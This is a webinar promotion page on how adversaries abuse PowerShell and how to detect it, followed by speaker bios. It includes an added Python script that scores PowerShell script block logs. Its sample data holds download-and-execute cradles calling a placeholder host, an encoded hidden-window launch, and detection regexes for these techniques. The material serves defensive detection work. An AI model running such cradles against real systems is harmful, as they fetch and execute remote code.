
The Detection Series: PowerShell

We’re exploring one of the year’s most prevalent MITRE ATT&CK® techniques: PowerShell. Join us to learn how adversaries abuse the Windows configuration management framework and how you can observe and detect malicious and suspicious commands and behaviors. 

On-Demand

1 Hour

Virtual


More often than not, T1059.001: PowerShell has been the number one ATT&CK technique in Red Canary’s annual Threat Detection Report. In the five years that we’ve been mapping threats to ATT&CK, there’s no technique we’ve detected more often. 

Installed on nearly every Windows operating system in the world, PowerShell is a versatile tool for automation and remote system management that’s beloved by administrators and adversaries alike. It allows adversaries to execute commands, obfuscate malicious activity, download arbitrary binaries, gather information, change system configurations, and much more—all while blending in with routine operating system activity. 

In this highly anticipated Detection Series webinar, experts from VMware Carbon Black, MITRE ATT&CK®, and Red Canary will provide insight into:

  • Common ways that adversaries abuse PowerShell
  • Tools and log sources that collect relevant telemetry
  • How to detect, mitigate, and respond to malicious PowerShell activity
  • Strategies for testing your security controls by executing suspicious PowerShell commands with Atomic Red Team  

Attendees will leave with a better understanding of what PowerShell is and how adversaries leverage it. More importantly, practitioners will know where to find malicious activity, how to develop detection analytics for it, and how to test their detection and visibility capabilities.
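As an added illustration of the detection side of that agenda (example code written for this page, not code from Red Canary, VMware Carbon Black, MITRE ATT&CK, or the webinar), the routine below triages PowerShell script block log entries of the kind script block logging records under Event ID 4104. It flags widely documented indicators such as encoded commands, hidden windows, download cradles and in-script base64 decoding, and it decodes `-EncodedCommand` payloads so that indicators hidden inside them are scored as well. The sample entries, the indicator names and the `scan_script_block` / `triage` helpers are all constructed for this example.

```python
import base64
import re

# Defender-side heuristics for commonly abused PowerShell features. The names and
# patterns are constructed for this example; each one is a well-known indicator,
# not a rule taken from the webinar or any vendor product.
INDICATORS = {
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob (captured for decoding)
    "encoded_command": re.compile(
        r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.IGNORECASE),
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.IGNORECASE),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
}

# Constructed second-stage script used to build the encoded sample below (not real telemetry).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
# -EncodedCommand takes base64 of the UTF-16LE bytes of the script, so encode it that way.
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed Event ID 4104 style entries: an id plus the logged script block text.
SAMPLE_SCRIPT_BLOCKS = [
    {"id": "sb-1", "text": "Get-Service | Where-Object {$_.Status -eq 'Running'}"},
    {"id": "sb-2", "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"},
    {"id": "sb-3", "text": "powershell.exe -NoProfile -w hidden -EncodedCommand " + ENCODED_STAGE2},
    {"id": "sb-4", "text": "-ExecutionPolicy Bypass -NonInteractive -File C:\\Scripts\\backup.ps1"},
    {"id": "sb-5", "text": "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob)) | Invoke-Expression"},
]


def decode_encoded_command(text):
    """Return the script behind an -EncodedCommand argument, or None if absent or undecodable."""
    match = INDICATORS["encoded_command"].search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(text):
    """Return the sorted list of indicator names a script block triggers.

    Indicators found inside a decoded -EncodedCommand payload are prefixed with
    'decoded:' so an analyst can see that the evidence came from the inner script.
    """
    hits = {name for name, pattern in INDICATORS.items() if pattern.search(text)}
    decoded = decode_encoded_command(text)
    if decoded:
        hits |= {"decoded:" + name for name, pattern in INDICATORS.items() if pattern.search(decoded)}
    return sorted(hits)


def triage(events):
    """Map event id -> indicator list for every event that triggered at least one indicator."""
    results = {}
    for event in events:
        hits = scan_script_block(event["text"])
        if hits:
            results[event["id"]] = hits
    return results


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(event_id, ", ".join(hits))
```

Two points worth noting when using this as a starting point: a single indicator such as `execution_policy_bypass` is low fidelity on its own, since administrators' scheduled scripts commonly use it, so the value is in combinations like an encoded, hidden-window launch whose decoded payload contains a download cradle; and the decoding step matters because the outer command line of an encoded launch shows nothing but a base64 blob, which is exactly why script block logging is the log source to collect.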

 
Matt Graeber
Director, Threat Research | Red Canary
Matt has worked the majority of his security career in offense, facilitating his application of an attacker’s mindset to detection engineering. By pointing out gaps in detection coverage, Matt is able to effectively offer actionable detection improvement guidance. Matt loves to apply his reverse engineering skills to understand attack techniques at a deeper level in order to understand the workflow attackers use to evade security controls.
 
Sarah Lewis
Senior Detection Engineer | Red Canary
Sarah works on the Detection Engineering team, which is responsible for threat detection and intelligence research. Prior to joining Red Canary, Sarah worked for the Air Force (as a civilian) in a digital forensics and behavioral malware analysis lab. Outside work, she enjoys playing video games, crafting, and watching movies.
 
Jamie Williams
Principal Adversary Emulation Engineer | MITRE ATT&CK
Jamie is an adversary emulation engineer for The MITRE Corporation, where he focuses on security operations and research, adversary emulation, and behavior-based detections. He leads the development of MITRE ATT&CK® for Enterprise and has also led teams that help shape and deliver the “adversary-touch” within MITRE Engenuity ATT&CK Evaluations as well as the Center for Threat-Informed Defense (CTID).
 
Casey Parman
Manager & Lead, Threat Analysis Unit | VMWare SBU
Casey Parman is the Manager and Threat Lead of VMware Carbon Black's Threat Analysis Unit Applied Research. He is focused on staying ahead of modern adversary tools and techniques through threat hunting and attack emulation. He leads a team of researchers to collect actionable intelligence that bolsters the security of organizations of all sizes. By leveraging his expertise in threat detection and the MITRE ATT&CK framework, Casey develops customized security solutions that are optimized to protect against emerging threats.